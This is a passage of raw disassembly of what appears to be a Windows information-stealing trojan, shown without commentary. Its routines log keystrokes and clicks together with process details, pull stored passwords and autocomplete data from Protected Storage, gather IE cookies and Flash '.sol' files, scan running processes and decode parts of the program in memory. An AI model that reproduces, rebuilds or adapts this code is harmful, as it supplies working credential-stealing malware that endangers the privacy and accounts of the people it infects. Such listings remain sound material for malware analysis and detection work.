mov eax, [ebp+2Ch]
pop edi
pop esi
pop ebx
leave
retn 2Ch
; =============== S U B R O U T I N E =======================================
sub_415ADE proc near ; CODE XREF: sub_41F4B6+104�p
arg_0 = word ptr 4
arg_4 = dword ptr 8
mov ax, [esp+arg_0]
push dword_40F854
mov word_40F85C, ax
call sub_41A83D
cmp [esp+4+arg_4], 0
pop ecx
jz short loc_415B0F
push 0FFFFFFFFh
push [esp+4+arg_4]
call sub_41BCB7
pop ecx
pop ecx
mov dword_40F854, eax
retn
; ---------------------------------------------------------------------------
loc_415B0F: ; CODE XREF: sub_415ADE+1C�j
and dword_40F854, 0
retn
sub_415ADE endp
; =============== S U B R O U T I N E =======================================
sub_415B17 proc near ; CODE XREF: sub_415B4A+1A�j
; sub_415B4A+49�p ...
push esi
mov esi, offset dword_40F838
push esi
call dword_40FE84 ; RtlEnterCriticalSection
push dword_40F858
call sub_41A83D
xor eax, eax
pop ecx
push esi
mov byte_40F834, al
mov dword_40F850, eax
mov dword_40F858, eax
call dword_40FE88 ; RtlLeaveCriticalSection
pop esi
retn
sub_415B17 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415B4A proc near ; CODE XREF: sub_415DD5+13C�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_4]
test ebx, ebx
jz loc_415C41
push edi
push 64h
pop edi
cmp ebx, edi
jbe short loc_415B69
pop edi
pop ebx
pop ebp
jmp sub_415B17
; ---------------------------------------------------------------------------
loc_415B69: ; CODE XREF: sub_415B4A+15�j
push offset dword_40F838
call dword_40FE84 ; RtlEnterCriticalSection
call dword_40FDE8 ; GetTickCount
mov [ebp+arg_4], eax
mov eax, dword_40F850
test eax, eax
jz short loc_415B98
mov ecx, [ebp+arg_4]
sub ecx, eax
cmp ecx, 0EA60h
jbe short loc_415B98
call sub_415B17
loc_415B98: ; CODE XREF: sub_415B4A+3A�j
; sub_415B4A+47�j
movzx eax, byte_40F834
add eax, ebx
cmp eax, edi
push esi
jbe short loc_415BF9
push edi
call sub_41A81F
mov esi, eax
test esi, esi
pop ecx
jz short loc_415C2C
push ebx
push [ebp+arg_0]
sub eax, ebx
add eax, edi
push eax
call sub_41A857
movzx eax, byte_40F834
add eax, dword_40F858
sub edi, ebx
push edi
lea eax, [eax+ebx-64h]
push eax
push esi
call sub_41A857
push dword_40F858
call sub_41A83D
add esp, 1Ch
mov dword_40F858, esi
mov byte_40F834, 64h
jmp short loc_415C2C
; ---------------------------------------------------------------------------
loc_415BF9: ; CODE XREF: sub_415B4A+5A�j
push eax
push dword_40F858
call sub_41BE45
test eax, eax
pop ecx
pop ecx
jz short loc_415C2C
movzx ecx, byte_40F834
push ebx
push [ebp+arg_0]
add ecx, eax
push ecx
mov dword_40F858, eax
call sub_41A857
add esp, 0Ch
add byte_40F834, bl
loc_415C2C: ; CODE XREF: sub_415B4A+67�j
; sub_415B4A+AD�j ...
mov eax, [ebp+arg_4]
push offset dword_40F838
mov dword_40F850, eax
call dword_40FE88 ; RtlLeaveCriticalSection
pop esi
pop edi
loc_415C41: ; CODE XREF: sub_415B4A+9�j
pop ebx
pop ebp
retn
sub_415B4A endp
; ---------------------------------------------------------------------------
dd 748B5653h, 0FF560C24h, 40FAE815h, 85D88B00h, 245C89DBh
dd 9E840F0Ch, 83000000h, 0E7401FEh, 740DFE83h, 7FE8309h
dd 8B850Fh, 53570000h, 0FEAC15FFh, 0F88B0040h, 7C74FF85h
dd 0FE83DB33h, 6A2A740Dh, 1288BE01h, 0E8560040h, 0FFFFFEB6h
dd 0FF575959h, 40FD9415h, 0E8575000h, 0FFFFFEA6h, 0E856016Ah
dd 0FFFFFE9Eh, 0EB10C483h, 0FF575539h, 40FD9015h, 55E88B00h
dd 5F5BE857h, 0D88B0000h, 5959DB85h, 16A1F74h, 401288BEh
dd 73E85600h, 55FFFFFEh, 0FE6CE853h, 16AFFFFh, 0FE64E856h
dd 0C483FFFFh, 0E8535D18h, 4B4Dh, 14245C8Bh, 15FF5359h
dd 40FEB0h, 0C38B5E5Fh, 4C25Bh
; =============== S U B R O U T I N E =======================================
sub_415D04 proc near ; CODE XREF: sub_41F4B6+21F�p
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
cmp byte_40F834, 0
jbe locret_415DAD
cmp dword_40F858, 0
jz locret_415DAD
push ebx
push esi
push edi
mov ebx, offset dword_40F838
push ebx
call dword_40FE84 ; RtlEnterCriticalSection
movzx eax, byte_40F834
mov esi, [esp+8+arg_4]
add eax, 0Ah
push eax
push dword ptr [esi]
call sub_41BE45
mov edi, eax
test edi, edi
pop ecx
pop ecx
jz short loc_415DA3
mov eax, dword_40FB34
push dword ptr [eax+148h]
call dword_40FD94 ; lstrlenA
push eax
mov [esi], edi
mov eax, dword_40FB34
push dword ptr [eax+148h]
push edi
call sub_41A857
movzx eax, byte_40F834
push eax
mov eax, [esi]
push dword_40F858
add eax, 6
push eax
call sub_41A857
movzx eax, byte_40F834
mov ecx, [esi]
mov byte ptr [ecx+eax+6], 0Ah
lea ecx, [eax+7]
mov eax, [esp+20h+arg_8]
add esp, 18h
add [eax], ecx
loc_415DA3: ; CODE XREF: sub_415D04+45�j
push ebx
call dword_40FE88 ; RtlLeaveCriticalSection
pop edi
pop esi
pop ebx
locret_415DAD: ; CODE XREF: sub_415D04+7�j
; sub_415D04+14�j
retn
sub_415D04 endp
; =============== S U B R O U T I N E =======================================
sub_415DAE proc near ; CODE XREF: .data:004157FA�p
push offset dword_40F838
call dword_40FE80 ; InitializeCriticalSection
and dword_40F858, 0
call sub_415B17
and word_40F85C, 0
and dword_40F854, 0
retn
sub_415DAE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415DD5 proc near ; CODE XREF: .data:00415F3C�p
; .data:00415F68�p ...
var_30C = byte ptr -30Ch
var_104 = byte ptr -104h
var_4 = byte ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 30Ch
push ebx
push edi
mov edi, [ebp+arg_0]
xor ebx, ebx
cmp edi, ebx
jz loc_415F19
mov eax, [edi+4]
cmp eax, 201h
push esi
jnz loc_415E8B
cmp word_40F85C, bx
jz loc_415F18
mov eax, dword_40FB34
dec word_40F85C
push 96h
push 1Eh
push dword ptr [eax+88h]
call sub_418A96
mov esi, eax
add esp, 0Ch
cmp esi, ebx
jz loc_415EB9
mov eax, dword_40F854
cmp eax, ebx
mov edi, eax
jnz short loc_415E44
mov edi, offset aUnknown ; "unknown"
loc_415E44: ; CODE XREF: sub_415DD5+68�j
call dword_40FDE8 ; GetTickCount
push eax
call dword_40FE44 ; GetCurrentProcessId
push eax
mov eax, dword_40FB34
push edi
push dword ptr [eax+8Ch]
lea eax, [ebp+var_30C]
push 103h
push eax
call dword_40FC84
lea eax, [ebp+var_30C]
push esi
push eax
call sub_41CF3B
mov eax, [esi]
add esp, 20h
push esi
call dword ptr [eax+8]
mov edi, [ebp+arg_0]
jmp short loc_415EB9
; ---------------------------------------------------------------------------
loc_415E8B: ; CODE XREF: sub_415DD5+21�j
cmp eax, 100h
jnz loc_415F18
push 11h
call dword_40FAE4
movsx eax, ax
mov esi, 80000000h
test eax, esi
jnz short loc_415F18
push 12h
call dword_40FAE4
movsx eax, ax
test eax, esi
jnz short loc_415F18
loc_415EB9: ; CODE XREF: sub_415DD5+59�j
; sub_415DD5+B4�j
lea eax, [ebp+var_104]
push eax
mov [ebp+var_2], bx
call dword_40FAF0
test eax, eax
jz short loc_415F18
push ebx
xor esi, esi
inc esi
push esi
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_104]
push eax
push ebx
push dword ptr [edi+8]
call dword_40FAEC
cmp eax, esi
jnz short loc_415F18
push ebx
push ebx
push esi
lea eax, [ebp+arg_0+3]
push eax
push esi
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
mov byte ptr [ebp+arg_0+3], bl
call dword_40FE64 ; WideCharToMultiByte
test eax, eax
jz short loc_415F18
cmp byte ptr [ebp+arg_0+3], bl
jz short loc_415F18
lea eax, [ebp+arg_0+3]
push esi
push eax
call sub_415B4A
pop ecx
pop ecx
loc_415F18: ; CODE XREF: sub_415DD5+2E�j
; sub_415DD5+BB�j ...
pop esi
loc_415F19: ; CODE XREF: sub_415DD5+12�j
pop edi
pop ebx
leave
retn
sub_415DD5 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call dword_40FAD8
mov esi, eax
test esi, esi
jz short loc_415F42
push dword ptr [ebp+8]
call sub_415DD5
pop ecx
loc_415F42: ; CODE XREF: .data:00415F37�j
mov eax, esi
pop esi
pop ebp
retn 10h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call dword_40FADC
mov esi, eax
test esi, esi
jz short loc_415F6E
push dword ptr [ebp+8]
call sub_415DD5
pop ecx
loc_415F6E: ; CODE XREF: .data:00415F63�j
mov eax, esi
pop esi
pop ebp
retn 10h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call dword_40FAE0
mov esi, eax
test esi, esi
jz short loc_415F9D
push dword ptr [ebp+8]
call sub_415DD5
pop ecx
loc_415F9D: ; CODE XREF: .data:00415F92�j
mov eax, esi
pop esi
pop ebp
retn 14h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call dword_40FAD4
mov esi, eax
test esi, esi
jz short loc_415FCC
push dword ptr [ebp+8]
call sub_415DD5
pop ecx
loc_415FCC: ; CODE XREF: .data:00415FC1�j
mov eax, esi
pop esi
pop ebp
retn 14h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415FD3 proc near ; CODE XREF: sub_416137+63�p
var_828 = byte ptr -828h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 828h
push edi
xor edi, edi
push edi
push 3
lea eax, [ebp+var_28]
push eax
push [ebp+arg_0]
mov [ebp+var_4], edi
call sub_41B0FA
add esp, 10h
test al, al
jz loc_416131
lea eax, [ebp+var_8]
push eax
push [ebp+var_24]
mov [ebp+var_8], edi
push [ebp+var_28]
call sub_41C873
add esp, 0Ch
cmp eax, edi
mov [ebp+var_14], eax
jz loc_416127
cmp [ebp+var_8], edi
mov [ebp+var_10], edi
mov [ebp+var_C], edi
jbe loc_41611A
push ebx
push esi
lea esi, [eax+4]
jmp short loc_416034
; ---------------------------------------------------------------------------
loc_416032: ; CODE XREF: sub_415FD3+12A�j
xor edi, edi
loc_416034: ; CODE XREF: sub_415FD3+5D�j
mov eax, [esi-4]
cmp eax, edi
mov [ebp+var_18], eax
jz loc_41610C
mov ebx, [esi]
cmp ebx, edi
jz loc_41610C
mov edi, [esi+4]
test edi, edi
jz loc_41610A
push eax
call sub_41BDDB
push ebx
call sub_41BDDB
push edi
call sub_41BDDB
xor ebx, ebx
add esp, 0Ch
cmp [ebp+var_10], ebx
jz short loc_416087
push 0FFFFFFFFh
push 0FFFFFFFFh
push edi
push [ebp+var_10]
call sub_41A493
add esp, 10h
test eax, eax
jz short loc_4160B8
loc_416087: ; CODE XREF: sub_415FD3+9E�j
push edi
push offset dword_4012A8
lea eax, [ebp+var_828]
push 7FFh
push eax
call dword_40FC88
push 1
lea eax, [ebp+var_828]
push eax
lea eax, [ebp+var_4]
push eax
call sub_41C80A
add esp, 1Ch
test al, al
jz short loc_416105
loc_4160B8: ; CODE XREF: sub_415FD3+B2�j
push dword ptr [esi]
lea eax, [ebp+var_828]
push [ebp+var_18]
push offset dword_4012A0
push 7FFh
push eax
call dword_40FC88
push 1
lea eax, [ebp+var_828]
push eax
lea eax, [ebp+var_4]
push eax
call sub_41C80A
add esp, 20h
test al, al
jz short loc_416105
add [ebp+var_C], 9
mov eax, [ebp+var_C]
add esi, 24h
cmp eax, [ebp+var_8]
mov [ebp+var_10], edi
jb loc_416032
jmp short loc_416118
; ---------------------------------------------------------------------------
loc_416105: ; CODE XREF: sub_415FD3+E3�j
; sub_415FD3+118�j
mov [ebp+var_4], ebx
jmp short loc_416118
; ---------------------------------------------------------------------------
loc_41610A: ; CODE XREF: sub_415FD3+7E�j
xor edi, edi
loc_41610C: ; CODE XREF: sub_415FD3+69�j
; sub_415FD3+73�j
push [ebp+var_4]
call sub_41A83D
pop ecx
mov [ebp+var_4], edi
loc_416118: ; CODE XREF: sub_415FD3+130�j
; sub_415FD3+135�j
pop esi
pop ebx
loc_41611A: ; CODE XREF: sub_415FD3+52�j
push [ebp+var_8]
push [ebp+var_14]
call sub_41A8D2
pop ecx
pop ecx
loc_416127: ; CODE XREF: sub_415FD3+43�j
lea eax, [ebp+var_28]
push eax
call sub_41B1B0
pop ecx
loc_416131: ; CODE XREF: sub_415FD3+23�j
mov eax, [ebp+var_4]
pop edi
leave
retn
sub_415FD3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416137 proc near ; CODE XREF: sub_416293+307�p
; .data:00416B28�p
var_21C = byte ptr -21Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 21Ch
cmp [ebp+arg_0], 0
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
jz short loc_416155
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
and dword ptr [esi], 0
loc_416155: ; CODE XREF: sub_416137+13�j
mov edi, 1000h
push edi
mov [ebp+var_1], 1
call sub_41A81F
mov ebx, eax
pop ecx
lea eax, [ebp+var_C]
push eax
mov [ebp+var_C], edi
mov dword ptr [ebx], 50h
mov eax, dword_40FB34
push ebx
push dword ptr [eax+124h]
call dword_40FB94
test eax, eax
mov [ebp+var_14], eax
jz loc_416241
loc_416191: ; CODE XREF: sub_416137+E1�j
cmp [ebp+arg_0], 0
jz short loc_4161ED
push dword ptr [ebx+8]
call sub_415FD3
test eax, eax
pop ecx
mov [ebp+var_8], eax
jz short loc_4161F6
push eax
call dword_40FD94 ; lstrlenA
mov ecx, [esi]
add ecx, eax
mov [ebp+var_10], eax
mov eax, [ebp+arg_4]
push ecx
push dword ptr [eax]
call sub_41BE45
test eax, eax
pop ecx
pop ecx
jz short loc_416220
mov ecx, [ebp+arg_4]
push [ebp+var_10]
mov [ecx], eax
mov ecx, [esi]
push [ebp+var_8]
add ecx, eax
push ecx
call sub_41A857
mov eax, [ebp+var_10]
push [ebp+var_8]
add [esi], eax
call sub_41A83D
add esp, 10h
jmp short loc_4161F6
; ---------------------------------------------------------------------------
loc_4161ED: ; CODE XREF: sub_416137+5E�j
push dword ptr [ebx+4]
call dword_40FBA0
loc_4161F6: ; CODE XREF: sub_416137+6E�j
; sub_416137+B4�j
push edi
mov [ebp+var_C], edi
push ebx
mov dword ptr [ebx], 50h
call sub_41BE72
pop ecx
pop ecx
lea eax, [ebp+var_C]
push eax
push ebx
push [ebp+var_14]
call dword_40FB98
test eax, eax
jnz loc_416191
jmp short loc_416238
; ---------------------------------------------------------------------------
loc_416220: ; CODE XREF: sub_416137+8D�j
push [ebp+var_8]
mov [ebp+var_1], 0
call sub_41A83D
mov eax, [ebp+arg_4]
push dword ptr [eax]
call sub_41A83D
pop ecx
pop ecx
loc_416238: ; CODE XREF: sub_416137+E7�j
push [ebp+var_14]
call dword_40FB9C
loc_416241: ; CODE XREF: sub_416137+54�j
push ebx
call sub_41A83D
cmp [ebp+arg_0], 0
pop ecx
pop edi
pop esi
pop ebx
jnz short loc_41628E
push 0
push 1Ah
lea eax, [ebp+var_21C]
push eax
push 0
call dword_40FBA8
test eax, eax
jz short loc_41628E
push offset aMacromediaFlas ; "Macromedia\\Flash Player"
lea eax, [ebp+var_21C]
push eax
push eax
call dword_40FC8C
lea eax, [ebp+var_21C]
push offset a_sol ; "*.sol"
push eax
call sub_41B7B1
pop ecx
pop ecx
loc_41628E: ; CODE XREF: sub_416137+118�j
; sub_416137+12F�j
mov al, [ebp+var_1]
leave
retn
sub_416137 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416293 proc near ; CODE XREF: .data:00416B20�p
var_60 = byte ptr -60h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 60h
push ebx
xor ebx, ebx
push ebx
push offset dword_401300
call sub_41B99C
test eax, eax
pop ecx
pop ecx
jz short loc_4162B4
xor al, al
jmp loc_41664A
; ---------------------------------------------------------------------------
loc_4162B4: ; CODE XREF: sub_416293+18�j
mov eax, dword_40FB34
push esi
push edi
push dword ptr [eax+138h]
push dword ptr [eax+128h]
call dword_40FD08 ; LoadLibraryA
push eax
call dword_40FD04 ; GetProcAddress
cmp eax, ebx
mov [ebp+var_18], ebx
mov [ebp+var_50], 10h
mov [ebp+var_4C], 2
mov [ebp+var_48], ebx
mov [ebp+var_44], ebx
mov [ebp+var_C], ebx
mov [ebp+var_8], ebx
jz loc_41658A
push ebx
push ebx
push ebx
lea ecx, [ebp+var_18]
push ecx
call eax ; dword_40FB34
test eax, eax
jnz loc_41658A
mov eax, [ebp+var_18]
cmp eax, ebx
jz loc_41658A
mov ecx, [eax]
lea edx, [ebp+var_2C]
push edx
push ebx
push ebx
push eax
call dword ptr [ecx+38h]
test eax, eax
jnz loc_416581
jmp loc_416560
; ---------------------------------------------------------------------------
loc_41632E: ; CODE XREF: sub_416293+2DF�j
cmp [ebp+var_40], 0E161255Ah
jnz loc_416560
mov eax, [ebp+var_18]
mov ecx, [eax]
lea edx, [ebp+var_28]
push edx
push ebx
lea edx, [ebp+var_40]
push edx
push ebx
push eax
call dword ptr [ecx+3Ch]
test eax, eax
jnz loc_416560
jmp loc_41653F
; ---------------------------------------------------------------------------
loc_41635B: ; CODE XREF: sub_416293+2BE�j
mov eax, [ebp+var_18]
mov ecx, [eax]
lea edx, [ebp+var_24]
push edx
push ebx
lea edx, [ebp+var_60]
push edx
lea edx, [ebp+var_40]
push edx
push ebx
push eax
call dword ptr [ecx+54h]
test eax, eax
jnz loc_41653F
mov [ebp+var_10], ebx
mov [ebp+var_4], ebx
jmp loc_41651E
; ---------------------------------------------------------------------------
loc_416385: ; CODE XREF: sub_416293+29D�j
mov eax, dword_40FB34
push dword ptr [eax+12Ch]
push [ebp+var_14]
call dword_40FC70
mov esi, eax
cmp esi, ebx
jz loc_41651E
cmp [esi+16h], bx
jnz loc_41651E
cmp esi, [ebp+var_14]
jz loc_41651E
mov eax, [ebp+var_18]
mov ecx, [eax]
push 10h
lea edx, [ebp+var_50]
push edx
lea edx, [ebp+var_4]
push edx
lea edx, [ebp+var_10]
push edx
push [ebp+var_14]
lea edx, [ebp+var_60]
push edx
lea edx, [ebp+var_40]
push edx
push ebx
push eax
call dword ptr [ecx+44h]
test eax, eax
jnz loc_41651E
cmp [ebp+var_10], 2
jbe loc_41651E
push [ebp+var_10]
call sub_41A81F
mov edx, eax
cmp edx, ebx
pop ecx
mov [ebp+var_20], edx
jz loc_41651E
mov [esi], bx
mov ecx, [ebp+var_10]
mov eax, [ebp+var_4]
add eax, ecx
xor esi, esi
xor edi, edi
cmp [eax-1], bl
jnz short loc_41645E
cmp [eax-2], bl
jnz short loc_41645E
cmp ecx, ebx
jbe short loc_41647E
loc_41641E: ; CODE XREF: sub_416293+1C7�j
mov eax, [ebp+var_4]
add eax, edi
mov cl, [eax]
cmp cl, bl
jnz short loc_416434
cmp [eax+1], bl
jnz short loc_416437
mov byte ptr [esi+edx], 7Ch
jmp short loc_416454
; ---------------------------------------------------------------------------
loc_416434: ; CODE XREF: sub_416293+194�j
cmp [eax+1], bl
loc_416437: ; CODE XREF: sub_416293+199�j
jbe short loc_416451
push ebx
push ebx
push 1
lea ecx, [esi+edx]
push ecx
push 1
push eax
push ebx
push ebx
call dword_40FE64 ; WideCharToMultiByte
mov edx, [ebp+var_20]
jmp short loc_416454
; ---------------------------------------------------------------------------
loc_416451: ; CODE XREF: sub_416293:loc_416437�j
mov [esi+edx], cl
loc_416454: ; CODE XREF: sub_416293+19F�j
; sub_416293+1BC�j
inc edi
inc edi
inc esi
cmp edi, [ebp+var_10]
jb short loc_41641E
jmp short loc_41647E
; ---------------------------------------------------------------------------
loc_41645E: ; CODE XREF: sub_416293+180�j
; sub_416293+185�j
cmp ecx, ebx
jbe short loc_41647E
loc_416462: ; CODE XREF: sub_416293+1E9�j
mov eax, [ebp+var_4]
mov al, [edi+eax]
cmp al, bl
jnz short loc_416471
push 7Ch
pop eax
jmp short loc_416474
; ---------------------------------------------------------------------------
loc_416471: ; CODE XREF: sub_416293+1D7�j
movzx eax, al
loc_416474: ; CODE XREF: sub_416293+1DC�j
mov [edi+edx], al
inc edi
inc esi
cmp edi, [ebp+var_10]
jb short loc_416462
loc_41647E: ; CODE XREF: sub_416293+189�j
; sub_416293+1C9�j ...
cmp byte ptr [esi+edx-1], 7Ch
jnz short loc_416486
dec esi
loc_416486: ; CODE XREF: sub_416293+1F0�j
push [ebp+var_14]
call dword_40FD90 ; lstrlenW
mov ecx, [ebp+var_8]
mov [ebp+var_1C], eax
add eax, esi
lea edi, [eax+ecx]
lea eax, [edi+6]
push eax
push [ebp+var_C]
call sub_41BE45
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+var_4], eax
jz short loc_416515
push ebx
push ebx
push [ebp+var_1C]
mov [ebp+var_C], eax
add eax, [ebp+var_8]
push eax
push [ebp+var_1C]
mov [ebp+var_4], eax
push [ebp+var_14]
push ebx
push ebx
call dword_40FE64 ; WideCharToMultiByte
mov eax, [ebp+var_1C]
add [ebp+var_4], eax
mov eax, [ebp+var_4]
mov byte ptr [eax], 20h
mov eax, [ebp+var_4]
mov byte ptr [eax+1], 3Dh
mov eax, [ebp+var_4]
push esi
push [ebp+var_20]
mov byte ptr [eax+2], 20h
add [ebp+var_4], 3
push [ebp+var_4]
call sub_41A857
mov eax, [ebp+var_4]
mov byte ptr [esi+eax], 0Dh
mov eax, [ebp+var_4]
mov byte ptr [esi+eax+1], 0Ah
mov eax, [ebp+var_4]
add esp, 0Ch
add edi, 5
mov [esi+eax+2], bl
mov [ebp+var_8], edi
loc_416515: ; CODE XREF: sub_416293+21A�j
push [ebp+var_20]
call sub_41A83D
pop ecx
loc_41651E: ; CODE XREF: sub_416293+ED�j
; sub_416293+10A�j ...
mov eax, [ebp+var_24]
mov ecx, [eax]
push ebx
lea edx, [ebp+var_14]
push edx
push 1
push eax
call dword ptr [ecx+0Ch]
test eax, eax
jz loc_416385
mov eax, [ebp+var_24]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_41653F: ; CODE XREF: sub_416293+C3�j
; sub_416293+E1�j
mov eax, [ebp+var_28]
mov ecx, [eax]
push ebx
lea edx, [ebp+var_60]
push edx
push 1
push eax
call dword ptr [ecx+0Ch]
test eax, eax
jz loc_41635B
mov eax, [ebp+var_28]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_416560: ; CODE XREF: sub_416293+96�j
; sub_416293+A2�j ...
mov eax, [ebp+var_2C]
mov ecx, [eax]
push ebx
lea edx, [ebp+var_40]
push edx
push 1
push eax
call dword ptr [ecx+0Ch]
test eax, eax
jz loc_41632E
mov eax, [ebp+var_2C]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_416581: ; CODE XREF: sub_416293+90�j
mov eax, [ebp+var_18]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_41658A: ; CODE XREF: sub_416293+60�j
; sub_416293+71�j ...
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_20]
push eax
push 1
mov [ebp+var_20], ebx
mov [ebp+var_1C], ebx
call sub_416137
add esp, 0Ch
test al, al
jz short loc_4165FC
mov edi, [ebp+var_1C]
cmp edi, ebx
jbe short loc_4165FC
mov eax, [ebp+var_8]
lea eax, [edi+eax+32h]
push eax
push [ebp+var_C]
call sub_41BE45
mov esi, eax
cmp esi, ebx
pop ecx
pop ecx
jz short loc_4165F3
mov eax, [ebp+var_8]
push 0Dh
add eax, esi
push offset aIeCookies ; "\nIE Cookies:\n"
push eax
mov [ebp+var_C], esi
call sub_41A857
add [ebp+var_8], 0Dh
mov eax, [ebp+var_8]
push edi
push [ebp+var_20]
add esi, eax
push esi
call sub_41A857
add esp, 18h
add [ebp+var_8], edi
loc_4165F3: ; CODE XREF: sub_416293+330�j
push [ebp+var_20]
call sub_41A83D
pop ecx
loc_4165FC: ; CODE XREF: sub_416293+311�j
; sub_416293+318�j
cmp [ebp+var_C], ebx
mov eax, dword_40FB34
mov ecx, [ebp+var_C]
pop edi
pop esi
jnz short loc_416611
mov ecx, [eax+134h]
loc_416611: ; CODE XREF: sub_416293+376�j
push ecx
mov ecx, [ebp+var_8]
add ecx, 32h
push ecx
push dword ptr [eax+130h]
push 6
call sub_41CAA9
push [ebp+var_C]
call sub_41A83D
push 4
lea eax, [ebp+var_30]
push eax
push offset dword_401300
mov [ebp+var_30], 1
call sub_41B9E9
add esp, 20h
mov al, 1
loc_41664A: ; CODE XREF: sub_416293+1C�j
pop ebx
leave
retn
sub_416293 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41664D proc near ; CODE XREF: .data:004167DE�p
var_22C = dword ptr -22Ch
var_224 = dword ptr -224h
var_208 = byte ptr -208h
push ebp
mov ebp, esp
sub esp, 22Ch
push ebx
push edi
push 0
push 2
xor bl, bl
mov [ebp+var_22C], 22Ch
call dword_40FE14 ; CreateToolhelp32Snapshot
mov edi, eax
lea eax, [ebp+var_22C]
push eax
push edi
call dword_40FE18 ; Process32FirstW
test eax, eax
jz short loc_4166D0
push esi
loc_416683: ; CODE XREF: sub_41664D+80�j
xor esi, esi
cmp [ebp+var_224], esi
jz short loc_4166BD
loc_41668D: ; CODE XREF: sub_41664D+6A�j
mov ecx, dword_40FB34
movzx eax, si
movzx eax, ds:word_40129C[eax*2]
push dword ptr [ecx+eax*4]
lea eax, [ebp+var_208]
push eax
call dword_40FD88 ; lstrcmpiW
test eax, eax
jz short loc_4166BB
inc esi
cmp si, 2
jb short loc_41668D
jmp short loc_4166BD
; ---------------------------------------------------------------------------
loc_4166BB: ; CODE XREF: sub_41664D+63�j
mov bl, 1
loc_4166BD: ; CODE XREF: sub_41664D+3E�j
; sub_41664D+6C�j
lea eax, [ebp+var_22C]
push eax
push edi
call dword_40FE1C ; Process32NextW
test eax, eax
jnz short loc_416683
pop esi
loc_4166D0: ; CODE XREF: sub_41664D+33�j
push edi
call dword_40FDAC ; CloseHandle
pop edi
mov al, bl
pop ebx
leave
retn
sub_41664D endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, [ebp+14h]
mov dword_40FD08, eax
mov eax, [ebp+18h]
sub esp, 43Ch
push 61h
mov dword_40FD04, eax
call sub_41BFFA
test al, al
pop ecx
jnz short loc_41670C
push 0
call dword ptr [ebp+0Ch]
jmp locret_416B4B
; ---------------------------------------------------------------------------
loc_41670C: ; CODE XREF: .data:00416700�j
push ebx
push esi
lea eax, [ebp-14h]
push eax
mov eax, dword_40FC1C
push 4
xor ebx, ebx
mov [ebp-14h], ebx
push dword ptr [eax+3Ch]
push eax
push dword_40FB30
call dword_40FE40 ; VirtualProtectEx
mov eax, dword_40FC1C
push 40h
pop ecx
cmp [eax+3Ch], ecx
jbe short loc_41675D
loc_41673B: ; CODE XREF: .data:0041675B�j
cmp ecx, 2
jb short loc_416757
cmp ecx, 48h
jb short loc_41674A
cmp ecx, 49h
jb short loc_416757
loc_41674A: ; CODE XREF: .data:00416743�j
lea esi, [eax+ecx]
mov al, [eax+48h]
sub [esi], al
mov eax, dword_40FC1C
loc_416757: ; CODE XREF: .data:0041673E�j
; .data:00416748�j
inc ecx
cmp ecx, [eax+3Ch]
jb short loc_41673B
loc_41675D: ; CODE XREF: .data:00416739�j
mov [ebp-4], ebx
call dword_40FD34 ; GetCommandLineA
mov esi, eax
cmp esi, ebx
jz short loc_4167B8
push 0Ah
push ebx
lea eax, [ebp-10h]
push eax
push esi
call dword_40FD94 ; lstrlenA
add eax, esi
push eax
push esi
call sub_41C757
add esp, 14h
cmp eax, ebx
jbe short loc_4167B8
mov esi, [ebp-10h]
xor edx, edx
cmp eax, ebx
jbe short loc_4167AF
loc_416793: ; CODE XREF: .data:004167AD�j
mov ecx, [esi+edx*4]
cmp byte ptr [ecx], 2Dh
jnz short loc_4167AA
cmp byte ptr [ecx+1], 66h
jnz short loc_4167AA
cmp [ecx+2], bl
